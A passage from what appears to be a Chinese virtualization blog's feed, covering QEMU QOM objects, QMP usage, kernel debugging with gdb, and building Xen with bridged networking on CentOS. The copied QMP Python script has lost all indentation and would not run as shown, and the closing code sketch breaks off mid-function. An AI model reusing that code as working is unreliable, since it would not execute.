    object_property_add_bool(obj, "realized",
                             device_get_realized, device_set_realized, NULL);
    object_property_add_bool(obj, "hotpluggable",
                             device_get_hotpluggable, NULL, NULL);
    object_property_add_bool(obj, "hotplugged",
                             device_get_hotplugged, device_set_hotplugged,
                             &error_abort);

    class = object_get_class(OBJECT(dev));
    do {
        for (prop = DEVICE_CLASS(class)->props; prop && prop->name; prop++) {
            qdev_property_add_legacy(dev, prop, &error_abort);
            qdev_property_add_static(dev, prop, &error_abort);
        }
        class = object_class_get_parent(class);
    } while (class != object_class_by_name(TYPE_DEVICE));

    object_property_add_link(OBJECT(dev), "parent_bus", TYPE_BUS,
                             (Object **)&dev->parent_bus, NULL, 0,
                             &error_abort);

    QLIST_INIT(&dev->gpios);
}
</code></pre></div></div>
<p>可以看到主要就是给对象添加了一些属性:Object的type属性,DeviceState的realized、hotpluggable属性等。值得注意的是,device_initfn还根据class->props添加了属性。在vmxnet3_class_init函数中可以看到,class在初始化的时候,其props已经被赋值为vmxnet3_properties:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static Property vmxnet3_properties[] = {
    DEFINE_NIC_PROPERTIES(VMXNET3State, conf),
    DEFINE_PROP_BIT("x-old-msi-offsets", VMXNET3State, compat_flags,
                    VMXNET3_COMPAT_FLAG_OLD_MSI_OFFSETS_BIT, false),
    DEFINE_PROP_BIT("x-disable-pcie", VMXNET3State, compat_flags,
                    VMXNET3_COMPAT_FLAG_DISABLE_PCIE_BIT, false),
    DEFINE_PROP_END_OF_LIST(),
};
</code></pre></div></div>
<p>这样,object_new之后,创建的object其实已经具有了很多属性了,这是从父object那里继承过来的。</p>
<p>接着看qdev_device_add函数,调用了object_property_set_bool</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>object_property_set_bool->object_property_set_qobject->object_property_set->property_set_bool->device_set_realized->vmxnet3_realize
</code></pre></div></div>
<p>最终,我们的vmxnet3_realize函数被调用了,这也就完成了object的构造,不同于type和class的构造,object当然是根据需要创建的,只有在命令行指定了设备或者是热插一个设备之后才会有object的创建。Class和object之间是通过Object的class域联系在一起的。如下图所示。</p>
<p><img src="/assets/img/qom/3.png" alt="" /></p>
<h2 id="第五节">五. 总结</h2>
<p>从上文可以看出,我把QOM的对象构造分成三部分:第一部分是type的构造,通过TypeInfo构造一个TypeImpl的哈希表,这是在main之前完成的;第二部分是class的构造,这是在main中进行的。这两部分都是全局的,也就是只要编译进去了的QOM对象都会执行。第三部分是object的构造,即构造具体的对象实例,只有在命令行指定了对应的设备或者热插一个设备时才会创建object。从上面也可以看出,正如Paolo Bonzini所说的,qemu在object方面的多态是class based的;而属性方面是动态构造的,每个实例可能都有不同的属性,这是一种prototype based的多态。</p>
<p>本文主要是对整个对象的产生做了介绍,没有对interface和property做过多介绍,以后有机会再详细说吧。</p>
<h2 id="后记">后记</h2>
<p>这篇文章很早很早以前就说写了,15年还在学校就应该写的,结果今年忙于挖洞,一直就拖啊拖的,一直到现在终于把这个坑填上,鄙视一下自己,自己已经准备了好多qemu内容,一直没有时间填坑,希望有时间都填上。</p>
<h2>参考</h2>
<ol>
<li><a href="http://mnstory.net/2014/10/qemu-device-simulation/">QEMU设备模拟</a></li>
<li>QOM exegesis and apocalypse, Paolo Bonzini, KVM Forum 2014</li>
</ol>
QMP简介2016-07-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/07/22/qmp-introduction
<p>QMP是一种基于JSON格式的传输协议,可以用于与虚拟机的交互,比如查询虚拟机的内部状态,进行设备的热插拔等。</p>
<p>有多种方法使用qmp,这里简要介绍通过tcp和unix socket使用qmp。</p>
<h3>通过TCP使用QMP</h3>
<p>使用-qmp添加qmp相关参数:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./qemu-system-x86_64 -m 2048 -hda /root/centos6.img -enable-kvm -qmp tcp:localhost:1234,server,nowait
</code></pre></div></div>
<p>使用telnet连接localhost:1234</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>telnet localhost 1234
</code></pre></div></div>
<p>之后就可以使用qmp的命令和虚拟机交互了</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost ~]# telnet localhost 1234
Trying ::1...
Connected to localhost.
Escape character is '^]'.
{"QMP": {"version": {"qemu": {"micro": 0, "minor": 6, "major": 2}, "package": ""}, "capabilities": []}}
{ "execute": "qmp_capabilities" }
{"return": {}}
{ "execute": "query-status" }
{"return": {"status": "running", "singlestep": false, "running": true}}
</code></pre></div></div>
<h3>通过unix socket使用QMP</h3>
<p>使用unix socket创建qmp:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./qemu-system-x86_64 -m 2048 -hda /root/centos6.img -enable-kvm -qmp unix:/tmp/qmp-test,server,nowait
</code></pre></div></div>
<p>Connect to the socket with nc:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc -U /tmp/qmp-test
</code></pre></div></div>
<p>From there on, everything is the same.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost qmp]# nc -U /tmp/qmp-test
{"QMP": {"version": {"qemu": {"micro": 0, "minor": 6, "major": 2}, "package": ""}, "capabilities": []}}
{ "execute": "qmp_capabilities" }
{"return": {}}
{ "execute": "query-status" }
{"return": {"status": "running", "singlestep": false, "running": true}}
</code></pre></div></div>
<p>The detailed format of QMP commands can be found in qmp-commands.hx in the top-level directory of the QEMU source tree.</p>
<h3>Sending QMP commands automatically in batches</h3>
<p>The method described <a href="https://gist.github.com/sibiaoluo/9798832">here</a> can send QMP commands to a virtual machine automatically in batches, which is handy for testing VM features. In my tests it worked over a Unix socket, but I could not get it to work over TCP.
In case the link goes stale, the code is attached below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># QEMU Monitor Protocol Python class
#
# Copyright (C) 2009 Red Hat Inc.
#
# This work is licensed under the terms of the GNU GPL, version 2. See
# the COPYING file in the top-level directory.
import sys, socket, json, time
from optparse import OptionParser
class QMPError(Exception):
pass
class QMPConnectError(QMPError):
pass
class QEMUMonitorProtocol:
def connect(self):
print self.filename
self.sock.connect(self.filename)
data = self.__json_read()
if data == None:
raise QMPConnectError
if not data.has_key('QMP'):
raise QMPConnectError
return data['QMP']['capabilities']
def close(self):
self.sock.close()
def send_raw(self, line):
self.sock.send(str(line))
return self.__json_read()
def send(self, cmdline, timeout=30, convert=True):
end_time = time.time() + timeout
if convert:
cmd = self.__build_cmd(cmdline)
else:
cmd = cmdline
print("*cmdline = %s" % cmd)
print cmd
self.__json_send(cmd)
while time.time() < end_time:
resp = self.__json_read()
if resp == None:
return (False, None)
elif resp.has_key('error'):
return (False, resp['error'])
elif resp.has_key('return'):
return (True, resp['return'])
def read(self, timeout=30):
o = ""
end_time = time.time() + timeout
while time.time() < end_time:
try:
o += self.sock.recv(1024)
if len(o) > 0:
break
except:
time.sleep(0.01)
if len(o) > 0:
return json.loads(o)
else:
return None
def __build_cmd(self, cmdline):
cmdargs = cmdline.split()
qmpcmd = { 'execute': cmdargs[0], 'arguments': {} }
for arg in cmdargs[1:]:
opt = arg.split('=')
try:
value = int(opt[1])
except ValueError:
value = opt[1]
qmpcmd['arguments'][opt[0]] = value
print("*cmdline = %s" % cmdline)
return qmpcmd
def __json_send(self, cmd):
# XXX: We have to send any additional char, otherwise
# the Server won't read our input
self.sock.send(json.dumps(cmd) + ' ')
def __json_read(self):
try:
return json.loads(self.sock.recv(1024))
except ValueError:
return
def __init__(self, filename, protocol="tcp"):
if protocol == "tcp":
self.filename = ("localhost", int(filename))
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif protocol == "unix":
self.filename = filename
print self.filename
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
#self.sock.setblocking(0)
self.sock.settimeout(5)
if __name__ == "__main__":
parser = OptionParser()
parser.add_option('-n', '--num', dest='num', default='10', help='Times want to try')
parser.add_option('-f', '--file', dest='port', default='4444', help='QMP port/filename')
parser.add_option('-p', '--protocol', dest='protocol',default='tcp', help='QMP protocol')
def usage():
parser.print_help()
sys.exit(1)
options, args = parser.parse_args()
print options
if len(args) > 0:
usage()
num = int(options.num)
qmp_filename = options.port
qmp_protocol = options.protocol
qmp_socket = QEMUMonitorProtocol(qmp_filename,qmp_protocol)
qmp_socket.connect()
qmp_socket.send("qmp_capabilities")
qmp_socket.close()
##########################################################
#Usage
#Options:
# -h, --help show this help message and exit
# -n NUM, --num=NUM Times want to try
# -f PORT, --file=PORT QMP port/filename
# -p PROTOCOL, --protocol=PROTOCOL
# QMP protocol
# e.g: # python xxxxx.py -n $NUM -f $PORT
##########################################################
</code></pre></div></div>
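<p>The script above targets Python 2. For reference, its core idea, turning a "cmd key=value" line into a QMP JSON command and sending it over the QMP Unix socket, can be sketched in Python 3 as follows. This is a minimal sketch, not a drop-in replacement: the socket path and the capability negotiation simply mirror the examples above.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>```python
import json
import socket

def build_qmp_cmd(cmdline):
    # Mirror __build_cmd above: 'balloon value=1024' ->
    # {"execute": "balloon", "arguments": {"value": 1024}}
    args = cmdline.split()
    cmd = {"execute": args[0], "arguments": {}}
    for arg in args[1:]:
        key, _, value = arg.partition("=")
        cmd["arguments"][key] = int(value) if value.isdigit() else value
    return cmd

def qmp_send(sock_path, cmdline):
    # Connect, negotiate capabilities, send one command, return its reply.
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.connect(sock_path)
        s.recv(4096)  # greeting banner {"QMP": ...}
        s.sendall(b'{"execute": "qmp_capabilities"}')
        s.recv(4096)
        s.sendall(json.dumps(build_qmp_cmd(cmdline)).encode())
        return json.loads(s.recv(4096))
```
</code></pre></div></div>
<p>For example, qmp_send("/tmp/qmp-test", "query-status") against the VM started earlier should return the same status object seen in the telnet session.</p>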
Debugging the Linux Kernel with QEMU2016-06-21T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/06/21/gdb-linux-kernel-by-qemu
<h3>Preface</h3>
<p>Anyone who moves from the Windows kernel to the Linux kernel probably misses Windows kernel debugging at first. In the early days, debugging the Linux kernel was inconvenient: you either patched in kgdb or leaned on printk to get problems solved. When I first came across virtualization I realized it was the perfect setting for two-machine debugging, and soon found articles online about debugging the Linux kernel with QEMU. For various reasons I never got around to trying it until recently, when I finally spent a few days making it work. The material online is all much alike and skips many pitfalls, so I wrote this article in the hope it helps someone. I keep QEMU and KVM clearly separate: QEMU is the virtualization software, and KVM is the kernel module that accelerates QEMU by executing code natively. The QEMU virtual machines mentioned below all use KVM acceleration by default.</p>
<p>Environment for this article:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Host: CentOS 7 x64 running inside VMware
Guest QEMU VM: CentOS 6.7 x64
Guest kernel source version: 3.18.35
</code></pre></div></div>
<p>The kernel module source used here, the simplest hello-world Linux driver, is provided at the end of this article.</p>
<h3>Creating the virtual machine</h3>
<p>For simplicity, install the virtualization environment via libvirt:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>yum install qemu-kvm qemu-img virt-manager libvirt libvirt-python libvirt-client virt-install virt-viewer
</code></pre></div></div>
<p>Then create the virtual machine with virt-manager.</p>
<p>Once the VM is created, download the kernel source from <a href="https://www.kernel.org/">kernel.org</a> (I used version 3.18.35) and edit the Makefile in the top-level directory, changing "-O2" on line 617 to "-O1". -O0 would of course be best, but as <a href="http://www.ibm.com/developerworks/cn/linux/1508_zhangdw_gdb/index.html">this article</a> notes, -O0 hits a bug, and 3.18.35 indeed fails to build with it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ifdef CONFIG_CC_OPTIMIZE_FOR_SIZE
KBUILD_CFLAGS += -Os $(call cc-disable-warning,maybe-uninitialized,)
else
KBUILD_CFLAGS += -O1    # changed here (was -O2)
</code></pre></div></div>
<p>Then replace the kernel inside the VM. Note the KGDB configuration options, which seem to be enabled by default.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make menuconfig
make
make modules_install
make install
</code></pre></div></div>
<p>This replaces the kernel in the QEMU virtual machine.</p>
<h3>Editing the VM configuration file</h3>
<p>To debug the QEMU VM, command-line arguments must be passed to the qemu process through libvirt.
The steps are as follows:
get the VM name from the second column of virsh list, then edit its configuration with virsh edit &lt;vm_name&gt;.
Two changes are needed:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><domain type='kvm' xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0'>
</code></pre></div></div>
<p>This is required for passing arguments to qemu through libvirt.</p>
<p>Add a qemu:commandline node after the last node, devices; note that it must come last.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <qemu:commandline>
<qemu:arg value='-S'/>
<qemu:arg value='-gdb'/>
<qemu:arg value='tcp::1234'/>
</qemu:commandline>
</code></pre></div></div>
<h3>Debugging a module in the QEMU VM</h3>
<p>First, create a Linux kernel source tree on the host at the same path as in the VM. For convenience, the VM keeps its kernel source in /root/linux-3.18.35, so you can simply run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>scp -r linux-3.18.35 root@192.168.122.1:/root
</code></pre></div></div>
<p>Now the guest and host use identical paths; do the same for any kernel modules of your own.</p>
<p>Start gdb on the host and connect to the port, then start the VM in virt-manager; you will see the VM stop. Module debugging is discussed first, because kernel debugging has another pitfall, covered later, so for now just continue (c) the VM.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost gdb]# ./gdb ~/linux-3.18.35/vmlinux
GNU gdb (GDB) 7.9
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /root/linux-3.18.35/vmlinux...done.
(gdb) target remote localhost:1234
Remote debugging using localhost:1234
0x0000000000000000 in irq_stack_union ()
(gdb)
</code></pre></div></div>
<p>When you interrupt the VM with ctrl-c, you may see:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Remote 'g' packet reply is too long
</code></pre></div></div>
<p>A patch is available <a href="https://sourceware.org/bugzilla/show_bug.cgi?id=13984">here</a>; apply it and the message goes away.</p>
<p>Set a breakpoint on do_init_module, then insmod poc.ko inside the VM; the VM stops at the breakpoint. The parameter mod->sect_attrs->attrs holds the information for each section. In this hello-world driver there is only .text, with no .bss or .data; we need to hand this information to gdb with the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>add-symbol-file xxx.ko <text addr> -s .data <data addr> -s .bss <bss addr>
</code></pre></div></div>
<p>After that you can single-step through the module. The whole session:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>^C
Program received signal SIGINT, Interrupt.
default_idle () at arch/x86/kernel/process.c:316
warning: Source file is more recent than executable.
316 trace_cpu_idle_rcuidle(PWR_EVENT_EXIT, smp_processor_id());
(gdb) b do_init_module
Breakpoint 1 at 0xffffffff810c5c0e: file kernel/module.c, line 3043.
(gdb) c
Continuing.
Breakpoint 1, do_init_module (mod=0xffffffffa02010e0) at kernel/module.c:3043
warning: Source file is more recent than executable.
3043 current->flags &= ~PF_USED_ASYNC;
(gdb) p /x mod->sect_attrs->attrs[1]->address
$1 = 0xffffffffa0201000
(gdb) add-symbol-file ~/hello/poc.ko 0xffffffffa0201000
add symbol table from file "/root/hello/poc.ko" at
.text_addr = 0xffffffffa0201000
(y or n) y
Reading symbols from /root/hello/poc.ko...done.
(gdb) b hello_init
Breakpoint 2 at 0xffffffffa020100d: file /root/hello/poc.c, line 7.
(gdb) c
Continuing.
Breakpoint 2, hello_init () at /root/hello/poc.c:7
7 struct task_struct *ts = current;
(gdb) n
8 printk("hello,world,%s\n",current->comm);
(gdb) p ts
$2 = (struct task_struct *) 0xffff88003c0b2190
(gdb) p ts->pid
$3 = 2629
(gdb) p ts->comm
$4 = "insmod\000erminal\000"
(gdb) n
9 ts = NULL;
(gdb) n
10 ts->pid=123;
(gdb) p ts
$5 = (struct task_struct *) 0x0 <irq_stack_union>
(gdb) p ts->pid
Cannot access memory at address 0x7f0
(gdb) n
</code></pre></div></div>
<h3>Debugging the VM kernel</h3>
<p>The above covers loadable modules. Many articles claim that you can simply b start_kernel as soon as the VM connects and debug the kernel; in reality the VM never stops at that breakpoint, nor at any other breakpoint in kernel code.</p>
<p>After a long search I finally found the answer <a href="https://bugs.launchpad.net/ubuntu/+source/qemu-kvm/+bug/901944">here</a>. In one sentence: you must set a hardware breakpoint first. After that, software breakpoints work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) target remote localhost:1234
Remote debugging using localhost:1234
0x0000000000000000 in irq_stack_union ()
(gdb) hb start_kernel    // hardware breakpoint
Hardware assisted breakpoint 1 at 0xffffffff81b40044: file init/main.c, line 501.
(gdb) c
Continuing.
Breakpoint 1, start_kernel () at init/main.c:501
warning: Source file is more recent than executable.
501 {
(gdb) n
510 set_task_stack_end_magic(&init_task);
(gdb) n
511 smp_setup_processor_id();
(gdb) p init_task
$1 = {state = 0, stack = 0xffffffff81a00000 <init_thread_union>, usage = {
...
(gdb) b security_init
Breakpoint 2 at 0xffffffff81b6ff8a: file security/security.c, line 67.
(gdb) c
Continuing.
Breakpoint 2, security_init () at security/security.c:67
warning: Source file is more recent than executable.
67 printk(KERN_INFO "Security Framework initialized\n");
(gdb)
</code></pre></div></div>
<p>The hello-world Linux driver source used:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/init.h>
#include <linux/module.h>
#include <linux/sched.h>
static int hello_init(void)
{
struct task_struct *ts = current;
printk("hello,world,%s\n",current->comm);
ts = NULL;
ts->pid=123;
return 0;
}
static void hello_exit(void)
{
printk("goodbye,world\n");
}
module_init(hello_init);
module_exit(hello_exit);
</code></pre></div></div>
<p>The Makefile; note -O0 to disable optimization:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m := poc.o
KDIR :=/lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
ccflags-y = -O0
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
</code></pre></div></div>
<h3>Notes</h3>
<ol>
<li>Paths must match between host and VM, for both the kernel and your own modules</li>
<li>Remember to patch gdb</li>
<li>Use a hardware breakpoint first when starting to debug kernel code</li>
</ol>
<h3>References</h3>
<ol>
<li><a href="http://www.ibm.com/developerworks/cn/linux/1508_zhangdw_gdb/index.html">Debugging the Linux kernel and modules with GDB and KVM</a></li>
<li><a href="http://blog.vmsplice.net/2011/04/how-to-pass-qemu-command-line-options.html">How to pass QEMU command-line options through libvirt</a></li>
<li><a href="https://bugs.launchpad.net/ubuntu/+source/qemu-kvm/+bug/901944">gdbserver inside qemu does not stop on breakpoints</a></li>
<li><a href="https://sourceware.org/bugzilla/show_bug.cgi?id=13984">Bug 13984 - gdb stops controlling a thread after “Remote ‘g’ packet reply is too long: …” error message</a></li>
</ol>
Setting up bridged networking for Xen 4.5 VMs on CentOS 6.72016-05-13T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/05/13/centos6xen4.5-bridge
<h3>Preface</h3>
<p>The previous article, <a href="http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/04/26/centos6xen4.5">Installing Xen from source on CentOS 6.7</a>, covered building Xen from source. But a Xen installed that way gives its virtual machines no working network; this article sets up a bridged network for Xen VMs.</p>
<h3>Replacing NetworkManager with network</h3>
<p>CentOS 6.7's network management service, NetworkManager, does not support bridging, so NetworkManager must be replaced with the network service.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>chkconfig NetworkManager off
chkconfig network on
service NetworkManager stop
service network start
</code></pre></div></div>
<p>Then create an ifcfg-eth0 file under /etc/sysconfig/network-scripts with the following content:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEVICE=eth0
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no
</code></pre></div></div>
<p>After service network restart, the network service is in effect.</p>
<h3>Adding xenbr0</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>brctl addbr xenbr0
</code></pre></div></div>
<p>Edit /etc/sysconfig/network-scripts/ifcfg-eth0:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEVICE=eth0
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no
BRIDGE=xenbr0
</code></pre></div></div>
<p>Add the file /etc/sysconfig/network-scripts/ifcfg-xenbr0:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEVICE=xenbr0
TYPE=bridge
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no
</code></pre></div></div>
<p>Then restart the network with service network restart. Using
vif = ['mac=00:01:02:03:04:05,bridge=xenbr0'] in the VM configuration file no longer reports an error, and the Xen VM can reach the network. Replace the kernel inside the VM as well, and you have a fully self-built, self-controlled stack.</p>
Installing Xen from source on CentOS 6.72016-04-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/04/26/centos6xen4.5
<h3>Preface</h3>
<p>I have long been used to the QEMU && KVM combination and recently decided to try Xen, hitting plenty of pitfalls along the way; I wrote this article so others can avoid them. Looking back at the process of building Xen, it is not hard to see why the community did not favor Xen back then: QEMU && KVM is architecturally simpler and cleaner, and easier to install and use, whereas Xen is full of traps. Still, stepping through those traps yourself does build patience and understanding of Xen.</p>
<h3>Environment</h3>
<ol>
<li>Dom0: CentOS 6.7 x64, kernel version: 3.18.24</li>
<li>Xen: 4.5.4</li>
</ol>
<h3>Installing prerequisites</h3>
<p>The package list can be found in <a href="http://wiki.xenproject.org/wiki/Compiling_Xen_From_Source">Compiling Xen From Source</a>; concretely:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>yum groupinstall "Development Tools"
yum-builddep xen
yum install transfig wget tar less texi2html libaio-devel dev86 glibc-devel e2fsprogs-devel gitk mkinitrd iasl xz-devel bzip2-devel
yum install pciutils-libs pciutils-devel SDL-devel libX11-devel gtk2-devel bridge-utils PyXML qemu-common qemu-img mercurial texinfo
yum install libidn-devel yajl yajl-devel ocaml ocaml-findlib ocaml-findlib-devel python-devel uuid-devel libuuid-devel openssl-devel
yum install python-markdown pandoc systemd-devel glibc-devel.i686
</code></pre></div></div>
<p>Install dev86 as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget http://mirror.centos.org/centos/6/os/x86_64/Packages/dev86-0.16.17-15.1.el6.x86_64.rpm
rpm -ivh dev86-0.16.17-15.1.el6.x86_64.rpm
</code></pre></div></div>
<h3>Installing Xen</h3>
<p>Download Xen from the <a href="http://www.xenproject.org/">Xen website</a> or via git, then build and install it with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./configure --prefix=/usr
make dist
make install
ldconfig
</code></pre></div></div>
<p>At this point the Xen kernel should appear under /boot. I was stuck here for a while: building Xen on CentOS 7 kept failing with a "set sse instruction disable" error, and after much struggle I gave up and switched to 6.7; open-source software can be rough, and it is probably related to the compiler's SSE options.</p>
<h3>Installing the Dom0 kernel</h3>
<p>Use a reasonably new kernel here. Linux is at 4.x already, so there is no point staying on 2.6; early kernels had poor Xen support. I used 3.18.</p>
<p>Inside make menuconfig I could not find the Xen options anywhere. Even vpsee's widely circulated article does not make this clear, probably because the author was too familiar with it to mention it, which cost me a detour. I eventually found the answer on the official site (so, do not be lazy: read the documentation).</p>
<p>After entering the make menuconfig interface, because of option dependencies the most important step is first to enable everything under:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Processor type and features | Linux guest support
</code></pre></div></div>
<p>Enable everything under that menu. The various Xen options then become visible; the Xen-related options live under the following menus:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Processor type and features | Linux guest support
Device Drivers | Character devices
Device Drivers | Block device
Device Drivers | Network device support
Device Drivers | Xen driver support
</code></pre></div></div>
<p>Enable all the Xen-related options above. Finally, there are also the CONFIG_CLEANCACHE and CONFIG_FRONTSWAP options, likewise under Processor type and features. A small tip: inside make menuconfig, type "/" and enter a keyword to find which menu an option belongs to. When done, cross-check your configuration against <a href="http://wiki.xenproject.org/wiki/Mainline_Linux_Kernel_Configs">Mainline Linux Kernel Configs</a>. After that you can happily build the kernel:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make
make modules_install
make install
</code></pre></div></div>
<h3>Adding a boot entry</h3>
<p>After installing the kernel, the new kernel image should be visible under /boot and a new entry should appear in /boot/grub/menu.lst. Copy the new kernel's entry to the end, and under root add the line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kernel /xen-4.5.gz
</code></pre></div></div>
<p>Change the former kernel and initrd lines to module, ending up similar to this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>title Xen
root(hd0,0)
kernel /xen-4.5.gz
module /vmlinuz-3.18.24 xxxxxxxxxx
module /initramfs-3.18.24.img
</code></pre></div></div>
<h3>Miscellaneous</h3>
<p>After rebooting and choosing the Xen entry, the xl command may still fail. If a shared library cannot be found, create a symlink to it from the install directory. If the error is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xc: error: Could not obtain handle on privileged command interface (2 = No such file or directory): Internal error
</code></pre></div></div>
<p>then add a line to /etc/fstab:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>none /proc/xen xenfs defaults 0 0
</code></pre></div></div>
<p>Finally, remember to enable xencommons at boot:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>chkconfig --level 5 xencommons on
</code></pre></div></div>
<h3>References</h3>
<ol>
<li><a href="http://wiki.xenproject.org/wiki/Compiling_Xen_From_Source">Compiling Xen From Source</a></li>
<li><a href="http://wiki.xenproject.org/wiki/Mainline_Linux_Kernel_Configs">Mainline Linux Kernel Configs</a></li>
<li><a href="http://www.vpsee.com/2014/07/compile-and-install-xen-from-source-code-on-centos-7-0/">Installing Xen 4.5 from source on CentOS 7.0</a></li>
</ol>
Parsing QEMU command-line options2015-09-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/09/26/qemu-options
<h3>Preface</h3>
<p>I am about to graduate and want to organize my virtualization notes before setting out on a new journey. I hope this becomes a series on virtualization theory and practice, including but not limited to fundamentals, source code analysis, translations of foreign articles, and demos. This first article analyzes QEMU's command-line option parsing.</p>
<h3>1. Analyzing QEMU code with gdb</h3>
<ol>
<li>When generating the Makefile with configure, pass --enable-kvm --enable-debug --target-list="x86_64-softmmu"</li>
<li>Download a minimal image, linux-0.2.img, from the QEMU website:
wget http://wiki.qemu.org/download/linux-0.2.img.bz2</li>
<li>
<p>Start QEMU under gdb:</p>
<p>gdb --args /usr/bin/bin/qemu-system-x86_64 linux-0.2.img -m 512 -enable-kvm -smp 1,sockets=1,cores=1,threads=1 -realtime mlock=off -device ivshmem,shm=ivshmem,size=1 -device ivshmem,shm=ivshmem1,size=2</p>
</li>
</ol>
<p>So many options are used here mainly to make the later walkthrough of QEMU's option parsing easier to follow.</p>
<h3>2. QEMU option parsing</h3>
<p>QEMU defines QEMUOption to represent a program option:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct QEMUOption {
const char *name;
int flags;
int index;
uint32_t arch_mask;
} QEMUOption;
</code></pre></div></div>
<p>vl.c defines a global array, qemu_options, holding all available options.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const QEMUOption qemu_options[] = {
{ "h", 0, QEMU_OPTION_h, QEMU_ARCH_ALL },
#define QEMU_OPTIONS_GENERATE_OPTIONS
#include "qemu-options-wrapper.h"
{ NULL },
};
</code></pre></div></div>
<p>qemu_options is generated under the QEMU_OPTIONS_GENERATE_OPTIONS macro by including the file qemu-options-wrapper.h. Depending on whether QEMU_OPTIONS_GENERATE_ENUM, QEMU_OPTIONS_GENERATE_HELP, or QEMU_OPTIONS_GENERATE_OPTIONS is defined, qemu-options-wrapper.h, together with the qemu-options.def file, expands to different content. qemu-options.def itself is generated in the Makefile from qemu-options.hx by the scripts/hxtool script.</p>
<p>For our purposes it is enough to know that qemu_options contains every possible option, such as -enable-kvm, -smp, -realtime, and -device used above.</p>
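<p>The generation step can be pictured with a toy sketch: hxtool keeps the DEF(...) option-definition lines of qemu-options.hx and drops the surrounding documentation. This is a deliberate simplification; the real scripts/hxtool also emits help text and handles other directives.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>```python
def extract_defs(hx_text):
    # Keep only the DEF(...) option-definition lines, roughly what
    # ends up in the generated qemu-options.def.
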